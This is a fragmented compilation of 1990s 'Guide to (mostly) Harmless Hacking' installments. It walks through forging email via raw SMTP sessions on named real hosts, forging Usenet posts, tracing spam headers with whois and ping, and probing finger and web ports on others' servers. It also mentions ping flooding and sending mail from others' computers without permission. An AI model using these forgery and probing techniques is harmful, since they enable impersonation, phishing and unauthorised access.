Sometimes email will go directly from sender to recipient, but if you email to someone far away, email may go
through several computers
...
And you can get access to almost any
one of these computers without a password! Furthermore, as you will soon learn, it is easy to get the
Internet addresses of these millions of computers
...
But others
have very little security
...

OK, so now that we are in Morris Worm country, what can we do with it?
********************************
Evil Genius note: Morris used the “DEBUG” command
...
Nowadays if you find a
program running on port 25 with the DEBUG command, it is probably a trap
...

********************************
Well, here's what I did
...
)
helo santa@north
...
org
250 callisto
...
edu Hello santa@north
...
org
mail from:santa@north
...
org
250 ...
org>
...
com
250 ...
Recipient Okay
data
354 Enter mail, end with "
...

250 Mail accepted
What happened here is that I sent some fake email to myself
...

*****************************
Evil Genius Tip: email which comes into your email reading program is handled by port 110
...
But usually POP, the program running on 110, won’t give you help with its commands and
boots you off the minute you make a misstep
...
pole
...

Apparently From: santa@north
...
org
Date: Fri, 12 Jul 96 12:18 MDT
But note that the header lines above say "Apparently-From" This is important because it alerts me to the
fact that this is fake mail
...
com
X Status:
It works!!!
Now here is an interesting fact
...
So how good your
fake email is depends on part on what email program is used to read it
...
pole
...
unm
...
com
with smtp
(Linux Smail3
...
28
...
It also tells what version of the smail program
was running
...
pole
...
So both Pine and Eudora show this is fake mail
...
pole
...
unm
...
1
...
1 #41) id m0uemnL 0000HFC; Fri, 12 Jul 96 12:18 MDT
Message Id: ...
edu>
Oh, oh! Not only does it show that it may be fake mail -- it has a message ID! This means that somewhere on
Callisto there will be a log of message IDs telling who has used port 25 and the smail program
...

Date: Fri, 12 Jul 96 12:18 MDT
Apparently From: santa@north
...
com
Apparently To: cmeinel@nmia
...
So if you want to fake email, it is harder to get away with it if you send it to someone using
Pine than if they use the free version of Eudora
...
)
But -- the email programs on port 25 of many Internet hosts are not as well defended as callisto
...
edu
...
In fact, it is possible that some may not even
keep a log of users of port 25, making them perfect for criminal email forgery
...
You need some sort
of encrypted verification scheme to be almost certain email is genuine
...
If you are
reading this you don’t know enough to forge email well enough to elude arrest
...
This will give you an idea of the small variations
you'll run into with this hack
...
Interlink
...
168
...
8
...
INTERLINK
...

Escape character is '^]'
...
NET Sendmail AIX 3
...
64/4
...
pole
...
NET Hello santa@north
...
org (plato
...
com)
Oh, oh! This sendmail version isn't fooled at all! See how it puts "(plato
...
com)" -- the computer I was
using for this hack -- in there just to let me know it knows from what computer I've telnetted? But what the

heck, all Internet hosts know that kind of info
...
Again, my
input has no numbers in front, while the responses of the computer are prefaced by the number 250:
mail from:santa@north
...
com
250 santa@north
...
com
...

rcpt to:cmeinel@nmia
...
com
...

data
354 Enter mail
...
character on a line by itself
...

250 Ok
quit
221 InterLink
...

OK, what kind of email did that computer generate? Here's what I saw using Pine:
Return Path: ...
org>
Received:
from InterLink
...
com
with smtp
(Linux Smail3
...
28
...
nmia
...
NET (AIX 3
...
64/4
...
Here the InterLink
...

However, many people use that Internet host computer
...
pole
...
AA23900@InterLink
...
com
It worked!
OK, here it doesn't say "Apparently-From," so now I know the computer ns
...
Net is a pretty good
one to send fake mail from
...
But its phoniness doesn’t just jump out at you
...
Hmmm, the University of California at Berkeley is renowned for its
computer sciences research
...
32
...
164 25
It responds with:
Trying 128
...
152
...

Connected to 128
...
152
...

Escape character is '^]'
...
berkeley
...
7
...
31 ready at Thu, 11 Jul 1996 12
help
214 This is Sendmail version 8
...
3

214 Commands:
214 HELO EHLO MAIL RCPT DATA
214 RSET NOOP QUIT HELP VRFY
214 EXPN VERB
214 For more info use "HELP "
...
Berkeley
...

214 For local information send email to Postmaster at your site
...

214 End of HELP info
Big f***ing deal! Oh, well, let's see what this computer (which we now know is named remarque) will do to
fake mail
...
pole
...
pole
...
Sender ok
Heyyy
...
I didn't say "helo" and this sendmail program didn't slap me on the wrist!
Wonder what that means
...
com
250 Recipient ok
DATA
354 Enter mail, end with "
...


...
berkeley
...
pole
...
com by nmia
...
1
...
1 #4)
id m0ueRnW 000LGiC; Thu, 11 Jul 96 13:53 MDT
Received:
from remarque
...
edu by nmia
...
1
...
1 #4)
id m0ueRnV 000LGhC; Thu, 11 Jul 96 13:53 MDT
Apparently To: ...
dis
...
berkeley
...
7
...
31)
id MAA23472; Thu, 11 Jul 1996 12:49:56 0700 (PDT)

Look at the three “received” messages
...
berkeley
...
but from merde
...
com, which in turn got the email from Remarque
...
dis
...
So is
“dis
...
”
Now let’s see what email from remarque looks like
...
pole
...
MAA23472@remarque
...
edu>
This is fake mail on a Berkeley computer for which I do not have a password
...
It doesn't warn that the Santa address is phony! Even better, it keeps secret the
name of the originating computer: plato
...
com
...
berkeley
...
(Note: last time I checked, they had fixed remarque, so don’t bother telnetting
there
...
Check out the email I created from atropos
...
org!
telnet atropos
...
org 25
Trying 140
...
185
...

Connected to atropos
...
org
...

220 atropos
...
org ESMTP Sendmail 8
...
4/CSUA ready at Fri, 12 Jul 1996 15:41:33
help
502 Sendmail 8
...
4 HELP not implemented
Gee, you're pretty snippy today, aren't you
...

helo santa@north
...
org
501 Invalid domain name
Hey, what's it to you, buddy? Other sendmail programs don't give a darn what name I use with "helo
...
But not a valid user name!
helo satan@unm
...
c2
...
nmia
...
59
...
165], pleased to meet you
Verrrry funny, pal
...
Why the #%&@ did you demand a valid domain
name when you knew who I was all along?
mail from:santa@north
...
com
250 santa@north
...
com
...
com
250 Recipient ok
data
354 Enter mail, end with "
...

250 PAA13437 Message accepted for delivery
quit

221 atropos
...
org closing connection
OK, what kind of email did that obnoxious little sendmail program generate? I rush over to Pine and take a
look:
Return Path: ...
com>
Well, how very nice to allow me to use my fake address
...
c2
...
com
with smtp
(Linux Smail3
...
28
...
com>
Received: from satan
...
edu (cmeinel@plato
...
com [198
...
166
...
c2
...
unm
...
Grump
...

by atropos
...
org (8
...
4/CSUA) with SMTP id PAA13437 for cmeinel@nmia
...
pole
...
PAA13437@atropos
...
org>
Oh, crap!
So, the moral of that little hack is that there are lots of different email programs floating around on port 25 of
Internet hosts
...


GUIDE TO (mostly) HARMLESS HACKING
Vol
...

_______________________________________________________
Before you get too excited over learning how finger can be used to crack an Internet host, will all you law
enforcement folks out there please relax
...
I’m certainly not handing
out code from those publicly available canned cracking tools that any newbie could use to gain illegal
access to some hosts
...
In fact,
some of these techniques are fun and legal as long as they aren’t taken too far
...

You could also use this information to become a cracker
...
Just keep in mind what it would be
like to be the “girlfriend” of a cell mate named “Spike
...
But “cracking” is gaining
illegal entry into a computer
...

*********************************
What is finger? It is a program which runs on port 79 of many Internet host computers
...

For review, let’s consider the virtuous but boring way to give your host computer the finger command:
finger Joe_Blow@boring
...
net
This causes your computer to telnet to port 79 on the host boring
...
net
...
plan
and
...

But the Happy Hacker way is to first telnet to boring
...
net port 79, from which we can then run its finger
program:
telnet boring
...
net 79
If you are a good Internet citizen you would then give the command:
Joe_Blow
or maybe the command:
finger Joe_Blow
This should give you the same results as just staying on your own computer and giving the command
“finger Joe_Blow@boring
...
net
...
ISP
...

Ah, but I don’t teach how to do felonies
...
ISP
...
You will also learn some perfectly legal things you can try to get finger to
do
...
ISP
...
ISP
...
Foobar
co 1d Wed 08:00 boring
...
net
This tells you that only one guy is logged on, and he’s doing nothing
...

Another command to which a finger port might respond is simply:

finger
If this command works, it will give you a complete list of the users of this host
...

Sometimes a system will have no restrictions on how lame a password can be
...
” If these don’t work for the cracker, there are widely circulated programs which try out every word
of the dictionary and every name in the typical phone book
...

A pas sword that is found in the dictionary but has one extra character is *not* a good password
...

There are plenty of other commands that may or may not work
...
In fact, a really cautious sysadmin will disable finger entirely
...
They provide information
only
...
“Root” is the account on a multi-user
computer which allows you to play god
...
With root access, you can completely destroy all data
on boring
...
net
...
ISP
...
The worst that can
happen is that the program will crash
...
what happens if finger crashes?
Let’s think about what finger actually does
...
ISP
...
And once there, you can give it a command that directs it to read files from any
user’s account you may choose
...

That means if it crashes, you may end up in root
...

*****************
YOU CAN GO TO JAIL TIP #1: Getting into a part of a comp uter that is not open to the public is illegal
...
You don’t have to cause any harm at all -- it’s still illegal
...

***************
Truly elite types will crack into a root account from finger and just leave immediately
...
ISP
...

The elite of the elite do more than just refrain from taking advantage of the systems they penetrate
...

************************************
YOU CAN GO TO JAIL TIP #2: When you break into a computer, the headers on the packets that carry your
commands tell the sysadmin of your target who you are
...
Tell temptation to take a hike!
************************************
Ah, but what are your chances of gaining root through finger? Haven’t zillions of hackers found all the
crashable stuph? Doesn’t that suggest that finger programs running on the Internet today are all fixed so
you can’t get root access through them any more?
No
...
If you are the user of an ISP that allows finger, ask yourself this question: is using it to
advertise your existence across the Internet worth the risk?

GUIDE TO (mostly) HARMLESS HACKING
Vol
...

_______________________________________________________

How do you like it when your sober news groups get hit with 900 number sex ads and Make Money Fast
pyramid schemes? If no one ever made those guys pay for their effrontery, soon Usenet would be inundated
with crud
...
But many
times that’s like using an atomic bomb to kill an ant
...

Spammers rely on forged email and Usenet posts
...
Well, it’s also easy to fake Usenet posts
...
" Examples of news groups are rec
...
misc, news
...
newusers,
sci
...
policy, and alt
...
There are well over 10,000 news groups
...
Then some of the people wanted
to talk about stuff like physics, space flight, barroom humor, and sex
...

*****************
Here’s a quick summary of how to forge Usenet posts
...
The Usenet port usually is open only to those with accounts on that system
...
myISP
...
com
...
”
With my ISP I get this result:
Trying 198
...
115
...

Connected to sloth
...
com
...

200 sloth
...
com InterNetNews NNRP server INN 1
...
]
xpath MessageID
Report problems to ...
Also, if you want to forge posts from an ISP other than your
own, keep in mind that some Internet host computers have an nntp port that requires either no password or
an easily guessed password such as “post
...

So, because you usually have to do this on your own ISP, this is much harder than email forging
...
And it is possible to tell where they were forged
...

Normally you won’t be able to learn the identity of the culprit yourself
...
But they are always on the run
...

And -- the spam attack I am about to teach you is perfectly legal! Do it and you are a certifiable Good Guy
...
We can’t get too many spam vigilantes out there!
The first thing we have to do is review how to read headers of Usenet posts and email
...
It
gives the names of Internet host computers that have been used in the creation and transmission of a
message
...
Alternatively, the
skilled forger may use the names of real hosts
...

First we’ll try an example of forged Usenet spam
...
personals
...
aviation
...
(People spam fighter pilots at
their own risk!)
So here is a ripe example of scam spam, as shown with the Unix-based Usenet reader, “tin
...
personals
Thread 134 of 450
Lines 110 >>>>FREE INSTANT COMPATIBILITY CHECK FOR SEL No responses
ppgc@ozemail
...
au glennys e clarke at OzEmail Pty Ltd - Australia
CLICK HERE FOR YOUR FREE INSTANT COMPATIBILITY CHECK!

http://www
...
com
...
We introduce ladies and gentlemen for friendship
and marriage
...


Of course the first thing that jumps out is their return email address
...

On a well-read group like alt
...
This avalanche immediately alerts the sysadmins of the
ISP to the presence of a spammer, and good-bye spam account
...

But just to be sure the email address is phony, I exit tin and at the Unix prompt give the command:
whois ozemail
...
au
We get the answer:
No match for "OZEMAIL
...
AU"
That doesn’t prove anything, however, because the “au” at the end of the email address means it is an
Australian address
...

The next step is to email something annoying to this address
...
But of course it bounces back with a no such address message
...
Lo and behold, it has an email address for this outfit,
perfect
...
net
...
Why am I not surprised that it is different from the address in the
alt
...
partners@hunterlink
...
au
...
According to computer security expert
Ira Winkler, “It is illegal to mail bomb a spam
...
If a
system is not configured properly, and has the mail directory on the system drive, you can take out the
whole system
...
”
***************************
Sigh
...
So what I did was
email one copy of that spam back to perfect
...
Now this might seem like a wimpy retaliation
...
But even just sending one email message to these guys may become
part of a tidal wave of protest that knocks them off the Internet
...


This high volume of email may be enough to alert their ISP’s sysadmin to spamming, and good-bye spam
account
...
’ It just happens
...
I figure that thousands of others are doing the same
...
I have no compunctions and no guilt
over it
...
And we are about learn one of them
...

Our first step will be to dissect the header of this post to see how it was forged and where
...

It arrives a few minutes later
...
swcp
...
ironhorse
...
uoregon
...
cso
...
edu!news
...
net!nntp04
...
com!nntp
...
com!gatech!nntp0
...
com!news
...
com!uunet!in2
...
net!OzEmail!O
zEmail-In!news
From: glennys e clarke ...
au>
NNTP-Posting-Host: 203
...
166
...
0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Mozilla 1
...
swcp
...
It’s the computer my ISP uses to host the
news groups
...

*******************
Newbie Note #2: Internet host computers all have names which double as their Net addresses
...
com
...
com” the second name
...
com” kind of like the city, state and zip code
...
com” is the domain
name owned by Southwest Cyberport
...
g
...
15
...
46
...
The header says this post was composed on the host 203
...
166
...
So we telnet
to its nntp server (port 119):
telnet 203
...
166
...
15
...
46
...
If this really was a computer that handles news groups, it
should have a nntp port that accepts visitors
...
But in this case it refuses any connection whatever
...
But this is not common in an ISP that would be serving a spammer dating service
...

Next I try to email postmaster@203
...
166
...
But I get back:
Date: Wed, 28 Aug 1996 21:58:13 -0600
From: Mail Delivery Subsystem ...
com
Subject: Returned mail: Host unknown (Name server: 203
...
166
...
15
...
46 (unrecoverable error)
----- Transcript of session follows ----501 postmaster@203
...
166
...
550 Host unknown (Name server: 203
...
166
...
swcp
...
6
...
6
...

Next we check the second from the top item on the header
...
So I check out its nntp port:
telnet news
...
com nntp
And the result is:
Trying 204
...
167
...

Connected to boxcar
...
com
...

502 You have no permission to talk
...

Connection closed by foreign host
OK, we now know that this part of the header references a real news server
...
com uses to handle the news groups: “boxcar
...
uoregon
...
223
...
25
...
uoregon
...

Escape character is '^]'
...
Goodbye
...

OK, this one is a valid news server, too
...
uu
...
uu
...
uu
...
This host computer in the header isn’t currently connected to the Internet
...
Let’s check the domain name next:
whois uu
...
(UU-DOM)
3060 Williams Drive Ste 601
Fairfax, VA 22031
USA
Domain Name: UU
...
UU
...
NET
(703) 206-5600
Fax: (703) 641-7702
Record last updated on 23-Jul-96
...

Domain servers in listed order:
NS
...
NET
137
...
1
...
PA
...
COM
16
...
0
...
123
...
18
UUCP-GW-2
...
DEC
...
1
...
19
NS
...
NET
192
...
202
...

Please use the whois server at nic
...
mil for MILNET Information
...
net is a real domain
...
uu
...
(However, there may be other explanations
for this, too
...
mindspring
...
180
...
185
...
mindspring
...

Escape character is '^]'
...
Goodbye
...

Interesting
...
What does this mean? Well, there’s a way to
try
...
That’s port 23, but telnet automatically goes to 23
unless we tell it otherwise:
telnet news
...
com
Now this is phun!
Trying 204
...
128
...

telnet: connect to address 204
...
128
...
180
...
167
...
180
...
167: Connection refused
Trying 204
...
128
...

telnet: connect to address 204
...
128
...
180
...
182
...
180
...
182: Connection refused
Trying 204
...
128
...

telnet: connect: Connection refused
Notice how many host computers are tried out by telnet on this command! They must all specialize in being
news servers, since none of them handles logins
...
There are 5 news server hosts
...
com
We get:
MindSpring Enterprises, Inc
...
COM
Administrative Contact:

Nixon, J
...
COM
404-815-0770
Technical Contact, Zone Contact:
Ahola, Esa (EA55) hostmaster@MINDSPRING
...
Anne (KAP4) peavler@MINDSPRING
...

Record created on 21-Apr-94
...
MINDSPRING
...
180
...
95
HENRI
...
COM
204
...
128
...
The domain name is the last
two parts separated by a period that comes after the “@” in an email address, or the last two parts separated
by a period in a computer’s name
...
The reason is that this part
of the header looks genuine, and offers lots of computers on which to forge a post
...
com with a copy of this post may get a result
...
Hmmm, maybe a 5
MB gif of mating hippos? Even if it is illegal?
But systems administrator Terry McIntyre cautions me:
“One needn't toss megabyte files back ( unless, of course, one is helpfully mailing a copy of the offending
piece back, just so that the poster knows what the trouble was
...
Spammer sends one post to ‘reach out
and touch’ thousands of potential customers
...
Most
Spammers get the point fairly quickly
...
Always, always, use private email to make such complaints
...
”
Well, the bottom line is that if I really want to pull the plug on this spammer, I would send a polite note
including the Usenet post with headers intact to the technical contact and/or postmaster at each of the valid
links I found in this spam header
...

Here’s an example of an email I got from Netcom about a spammer I helped them to track down
...
com>
Reply-To: ...
We have informed this user of our policies, and have taken appropriate action,
up to, and including cancellation of the account, depending on the particular incident
...

The following issues have been dealt with:
santigo@ix
...
com
date-net@ix
...
com
jhatem@ix
...
com
kkooim@ix
...
com
duffster@ix
...
com
spilamus@ix
...
com
slatham@ix
...
com
jwalker5@ix
...
com
binary@ix
...
com
clau@ix
...
com
frugal@ix
...
com
magnets@ix
...
com
sliston@ix
...
com
aessedai@ix
...
com
ajb1968@ix
...
com
readme@readme
...
netcom
...
netcom
...
netcom
...
netcom
...
com
prospnet@ix
...
com
alluvial@ix
...
com
hiwaygo@ix
...
com
falcon47@ix
...
com
iggyboo@ix
...
com
joyful3@ix
...
com
kncd@ix
...
com
mailing1@ix
...
com
niterain@ix
...
com
mattyjo@ix
...
com
noon@ix
...
com
rmerch@ix
...
com
rthomas3@ix
...
com
rvaldes1@ix
...
com
sia1@ix
...
com
thy@ix
...
com
vhs1@ix
...
com
Sorry for the length of the list
...
com
**************

GUIDE TO (mostly) HARMLESS HACKING
Vol
...

_______________________________________________________
So, have you been out on Usenet blasting spammers? It's phun, right?
But if you have ever done much posting to Usenet news groups, you will
notice that soon after you post, you will often get spam email
...

Here's one I recently got:
Received:from mail
...
com (70
...
ca
...
att
...
238
...
70]) by mail-e2b-service
...
com (8
...
1/8
...
9) with SMTP id BAA14636; Sat, 17 Aug 1996
01:55:06 -0400 (EDT)
Date: Sat, 17 Aug 1996 01:55:06 -0400 (EDT)
Message-Id: <199608170555
...
gnn
...
com
"FREE" House and lot in "HEAVEN"
Reserve yours now, do it today, do not wait
...
You receive a Personalized Deed and detailed Map to your home in HEAVEN
...
98 cash, check, or money order to
help cover s/h cost
TO: Saint Peter's Estates
P
...
Box 9864
Bakersfield,CA 93389-9864
This is a gated community and it is "FREE"
...

>From the Gate Keeper
...
See you at the Pearly Gates)
GOD will Bless you
...
To
identify the culprit, we emplo y the same command that we used with Usenet spam:
whois heaven
...
Olive Avenue
Burbank, CA 91506

Domain Name: HEA VEN
...
COM
(818) 295-6671

Billing Contact:

Record last updated on 02-Apr-96
...

Domain servers in listed order:
CHEX
...
COM
NOC
...
NET

206
...
180
...
153
...
22

>From this we conclude that this is either genuine (fat chance) or a better forgery than most
...
com
...
com
We get:
[heaven
...
com: Connection timed out
There are several possible reasons for this
...
com has disabled the finger port
...
com is inactive
...

*********************
Newbie note: You can register domain names without setting them up on a
computer anywhere
...
However, if you don't get it hosted by a computer on the
Internet within a few weeks, you may loose your registration
...
This command tells you whether a computer is
currently hooked up to the Internet and how good its connection is
...
But I am
going to make you wait in dire suspense for a later Guide to (mostly) Harmless Hacking to tell you how some
people use ping
...

Because of ping's potential for mayhem, your shell account may have disabled the use of ping for the casual
user
...
So I give the command:
/usr/etc/ping heaven
...
com is alive

***********************
Technical Tip: On some versions of Unix,giving the command "ping" will start your computer pinging the
target over and over again without stopping
...
And be patient, next Guide to (mostly) Harmless Hacking will tell you more about the serious
hacking uses of ping
...
com is hooked up to the Internet right now
...
com
This should get us to a screen that would ask us to give user name and
password
...
182
...
1
...
com
...

How about chex
...
com? Maybe it is the place where spam originated? I type in:
telnet chex
...
com 79
This is the finger port
...
17
...
2
...
"
This suggests strongly that neither heaven
...
heaven
...

So this is probably a forged link in the header
...
com
The answer is:
America Online (GNN2-DOM)
8619 Westwood Center Drive
Vienna, VA 22182
USA
Domain Name: GNN
...
NET
703-453-4427
Technical Contact, Zone Contact:
Runge, Michael (MR1268) runge@AOL
...
COM
703-453-4411
Record last updated on 07-May-96
...

Domain servers in lis ted order:
DNS-01
...
COM
DNS-AOL
...
NET

204
...
98
...
83
...
28

Whoa! GNN
...
Now America Online, like
Compuserve, is a computer network of its own that has gateways into the
Internet
...
com would be routing email
through AOL, is it? It would be almost like finding a header that claims its email was routed through the wide
area network of some Fortune 500
corporation
...
com, was forged
...
Having decided there is money in forging spam, he or
she may have gotten a shell account offered by the AOL subsidiary, GNN
...

Sounds logical, huh? Ah, but let's not jump to conclusions
...

So let's check out the remaining link in this header:
whois att
...
NET
Administrative Contact, Technical Contact, Zone Contact:
DNS Technical Support (DTS-ORG) hostmaster@ATTMAIL
...
COM
201-331-4453
Record last updated on 27-Jun-96
...

Domain servers in listed order:
ORCU
...
BR
...
ELS -GMS
...
NET199
...
129
...
WY
...
NP
...
ATT
...
191
...
43
OHCU
...
MT
...
ELS-GMS
...
NET199
...
144
...
MA
...
NP
...
ATT
...
191
...
136
Another valid domain! So this is a reasonably ingenious forgery
...
com, gnn
...
net
...
com is highly unlikely because we can't get even the
login port to work
...
com and att
...

The next step is to email a copy of this spam *including headers* to both postmaster@gnn
...
NET, who is listed
by whois as the technical contact
...
net (the good guess) or
hostmaster@ATTMAIL
...
Also email postmaster@heaven
...
com and root@heaven
...

Presumably one of the people reading email sent to these addresses will use the email message id number to
look up who forged this email
...

But here is a shortcut
...

There's a news group on the Usenet where people can exchange information on both email and Usenet
spammers,
news
...
net-abuse
...
Let's pay it a visit and see what people may have dug up on
FREE@heaven
...
Sure enough, I find a post on this heaven scam:
From: bartleym@helium
...
com (Matt Bartley)
Newsgroups: news
...
net-abuse
...
com
Supersedes: <4uvq4a$3ju@helium
...
com>
Date: 15 Aug 1996 14:08:47 -0700
Organization: Interstate Electronics Corporation
Lines: 87
Message-ID: <4v03kv$73@helium
...
com>
NNTP-Posting-Host: helium
...
com
(snip)
No doubt a made-up From: header which happened to hit a real domain
name
...
net, gnn
...
com notified
...
com has already stated that it came from
att
...
Clearly the first Received: header is inconsistent
...
net
...
He replied,
"From the small number of spam messages I have been seeing - given the number of generations of
exponential net growth I have seen in 20 years - the system appears to be *strongly* self regulating
...

"I applaud Carolyn's efforts in this area
...
Spammers are controlled by the market
...
If that action causes problems for an ISP it puts it in their
economic interest to drop customers who cause such harm, ie the spammers
...


"And remember that I say this as the Technical Director of the largest ISP in Northern Ireland
...
We already
have a fairly decent self-policing mechanism in place
...

"Invite the gov't to do our work for us, and some damn bureaucrats will
write up Rules and Regulations and Penalties and all of that nonsense
...
"
So it looks like Internet professionals prefer to control spam by having net vigilantes like us track down
spammers and report them to their ISPs
...


GUIDE TO (mostly) HARMLESS HACKING
Vol
...

_______________________________________________________
How do we deal with offensive Web sites?
Remember that the Internet is voluntary
...

As the spam kings Jeff Slayton, Crazy Kevin, and, oh, yes, the original spam artists Cantor and Siegal have
learned, life as a spammer is life on the run
...

The reason I bring this up is that a Happy Hacker list member has told me he would like to vandalize kiddie
porn sites
...
You can get thrown in jail! I
don’t want the hacker tools you can pick up from public Web and ftp sites to lure anyone into getting
busted
...
But it is hard to use them without getting caught!
*****************
YOU CAN GO TO JAIL NOTE: Getting into a part of a computer that is not open to the public is illegal
...
You don’t have to cause any harm at all -- it’s still illegal
...
Even if you
are doing what you see as your civic duty by vandalizing kiddie porn -- it’s still illegal
...
It took just two grouchy hacker guys to get the DC-stuff list turned off
...
But what if the Internet were limited to carrying only stuff that was totally
inoffensive to everyone? That’s why it is against the law to just nuke ISPs and Web servers you don’t like
...
It is *so*
easy that doing this kind of stuph is NOT elite!

So what’s the legal alternative to fighting kiddie porn? Trying to throw Web kiddie porn guys in jail doesn’t
always work
...
Many
countries have no laws against kiddie porn on the Internet
...

*******************
They can go to jail note: In the US and many other countries, kiddie porn is illegal
...
So if you know enough to help the authorities get a search
warrant, by all means contact them
...

*******************
But the kind of mass outrage that keeps spammers on the run can also drive kiddie porn off the Web
...

The key is that no one can force an ISP to carry kiddie porn -- or anything else
...
If the ISP is run by some
pervert who wants to make money by offering kiddie porn, then you go to the next level up, to the ISP that
provides connectivity for the kiddie porn ISP
...

So, how do you find the people who can put a Web site on the run? We start with the URL
...
But please keep in mind that I am not saying this actually is a web address with
kiddie porn
...
It also, by at least some standards, carries X-rated material
...

http://www
...
org
Now let’s say someone just told you this was a kiddie porn site
...

This is how hacker wars start
...
org is actually a nice guy place? Even if they did once display
kiddie porn, perhaps they have repented
...
” So this Web site doesn’t look like it’s there just now
...

There is a way to tell if the computer that serves a domain name is running: the ping command:
/usr/etc/ping phreak
...
org
Now if this Web site had been up, it would have responded like my Web site does:
/usr/etc/ping techbroker
...
com is alive
*************************

Evil Genius Note: Ping is a powerful network diagnostic tool
...
Quarterdeck
Internet Suite and many other software packages also offer this wimpy version of the ping command
...
This can keep the
target extremely busy and may be enough to put the computer out of action
...
So -*now* do you want to install Linux?
*************************
*************************
Netiquette warning: “Pinging down” a host is incredibly easy
...
If you do it anyhow, be ready to be sued by the owner of your target and
kicked off your ISP-- or much worse! If you should accidentally get the ping command running in assault
mode, you can quickly turn it off by holding down the control key while pressing the “c” key
...

************************
OK, now we have established that at least right now, http://phreak
...

But is this temporary or is it gone, gone, gone? We can get some idea whether it has been up and around
and widely read from the search engine at http://altavista
...
com
...
Are there many Web sites with links to phreak
...
phreak
...
phreak
...
So it looks like the phreak
...

Well, does phreak
...
org
Phreaks, Inc
...

1313 Mockingbird Lane
San Jose, CA 95132 US
Domain Name: PHREAK
...
ORG
(408) 262-4142
Technical Contact, Zone Contact:
Hall, Barbara (BH340) rain@PHREAK
...
262
...

Record created on 30-Apr-95
...
PPP
...
NET

204
...
33
...
ASYLUM
...
217
...
17
NS
...
NET
204
...
8
...
org again
...
So now we have learned that
the computer hosting phreak
...
(In fact, later
probing shows that it is often down
...
org
Trying 204
...
33
...

Connected to phreak
...

Escape character is '^]'
...

Aha! Someone has connected the computer hosting phreak
...
It may well have a firewall that rejects attempted logins from anyone who
telnets in from a host that is not on its approved list
...
org
Its response is:
[phreak
...
Finger it yourself if you really want to see it
...

The fact that phreak
...
Since finger is one of the best ways to crack into
a system, we can conclude that either:
1) The phreak
...
org to send out insulting messages that the sysadmin doesn’t care about the
security risk of running finger
...


One of the Happy Hacker list members who helped me by reviewing this Guide, William Ryan, decided to
further probe phreak
...
When I tried
using the port 79 method on phreak
...
" When I tried using finger, I get logged on and a message is displayed
shortly thereafter "In real life???"”
Oh, this is just *too* tempting
...
org? We
could just bring up a Web surfing program and take a look
...
Besides, I don’t want to view dirty pictures and naughty words
...
org 80
Here’s what I get:
Trying 204
...
33
...

Connected to phreak
...

Escape character is '^]'
...
0 400 Bad Request
Server: thttpd/1
...

---

thttpd/1
...

Now we know that phreak
...
This server is called thttpd,
version 1
...
We also may suspect that it is a bit buggy!
What makes me think it is buggy? Look at the version number: 1
...
Also, that’s a pretty weird error message
...
org, I would get a better program running on port 80 before
someone figures out how to break into root with it
...
In the case of a Web server, you want to give readonly access to remote users in any user’s directories of html files
...

And a program with calls to root just might crash and dump you out into root
...
“Root” is the account on a multi-user
computer which allows you to play god
...
With root access, you can
completely destroy all data on boring
...
net or any other host on which you gain root
...
I do one little experiment:
telnet phreak
...
75
...
33
...
org
...

Because the program on port 80 times out on commands in a second or less, I was set up ready to do a paste
to host command, which quickly inserted the following command:

thttpd/1
...
org’s port 80 program:
HTTP/1
...
00
Content-type: text/html
Last-modified: Thu, 22-Aug-96 19:45:15 GMT

501 Not Implemented

The requested method '

...
acme
...
00
Connection closed by foreign host
...
The tiny/turbo/throttling HTTP server does not fork and is
very careful about memory
...
org URL and get the message “does not have a DNS entry
...
But whois tells me it is
registered with Internic
...
And it’s running on a port
...
arghhh
...
The phreak
...
” But that software shows major symptoms of being a
security risk!
So what may we conclude? It looks like phreak
...
But it is only sporadically
connected to the Internet
...
org
...
Ah-ah-ah, don’t touch that buggy port 80! Or that tempting port 79! Ping in moderation, only!
********************************

You can go to jail note: Are you are as tempted as I am? These guys have notorious cracker highway port 79
open, AND a buggy port 80! But, once again, I’m telling you, it is against the law to break into non-public
parts of a computer
...
Even if you think there is
something illegal on that thttpd server, only someone armed with a search warrant has the right to look it
over from the root account
...
org (remember, this is just being used as an illustration) I
would email a complaint to the technical and administrative contacts of the ISPs that provide phreak
...
So I look to see who they are:
whois PC
...
ABLECOM
...
PPP
...
NET
Address: 204
...
33
...
1
...
NET
...
ASYLUM
...
ASYLUM
...
217
...
17
System: ? running ?
Record last updated on 30-Apr-96
...
ORG
I check out the last ISP:
whois NS
...
NET
And get:
NEXUS-Chicago (BUDDH-HST)
1223 W North Shore, Suite 1E
Chicago, IL 60626
Hostname: NS
...
NET
Address: 204
...
8
...
COM
312-352-1200
Record last updated on 31-Dec-95
...
COM with evidence of the offending material
...
PPP
...
NET and postmaster@ ASYLUM
...
ORG
...
Instead of waging escalating hacker wars that can end up getting people thrown in jail, document
your problem with a Web site and ask those who have the power to cut these guys off to do something
...

*************************
Netiquette alert: If you are just burning with curiosity about whether thttpd can be made to cras h to root,
*DON’T* run experiments on phreak
...
The sysadmin will probably notice all those weird
accesses to port 80 on the shell log file
...
You will probably lose your account
...
Once you get Linux up you could install thttpd
...

If you should find a bug in thttpd that seriously compromises the security of any computer running it, then
what do you do? Wipe the html files of phreak
...
org with this information
...
You will become a hero and
be able to charge big bucks as a computer security consultant
...

Trust me
...
1 No
...
People love to fake out their friends by sending
them email that looks like it is from Bill_Gates@microsoft
...
pole
...
mil
...

Thanks to these problems, most email programs are good Internet citizens
...
Have you
ever tried to forge email using Compuserve or AOL? I’m afraid to ever say something is impossible to hack,
but those email programs have all resisted my attempts
...

But for industrial strength email forging there is Eudora Pro for Windows 95, Qualcomm’s gift to the Internet
and the meanest, baddest email program around
...
This will include how to forge:
· Who sent the mail
· Extra headers to fake the route it took though the Internet
· Even the message ID!
· And anything else you can imagine
· Plus, how to use Eudora for sending your email from other people’s computers -- whether they like it or not
...
They will assume I am
just going to teach the obvious stuff, like how to put a fake sender on your email
...
This is serious stuff
...
com>
Received: from kizmiaz
...
org (root@kizmiaz
...
org [206
...
78
...
com (8
...
6/8
...
6) with ESMTP id VAA09915
for ...
foo66
...
59
...
41])
by kizmiaz
...
org (8
...
5/8
...
5) with SMTP id UAA29704
for ...
2
...
19970913214737
...
ir>
received: from emout09
...
ayatollah
...
mx
...
com [198
...
11
...
com (8
...
6/8
...
6) with
ESMTP id MAA29967 for ...
ir (Unverified)
X-Mailer: Windows Eudora Pro Version 2
...
0
Content-Type: text/plain; charset="us-ascii"
To: cpm@foo66
...
com>
Subject: Test of forged everything
I actually sent this email though a PPP connection with my account cpm@foo66
...
Yes, this email began and ended up at the same computer
...
fu
...
ir
...
ir
...
Many people, even experienced sysadmins and hackers,
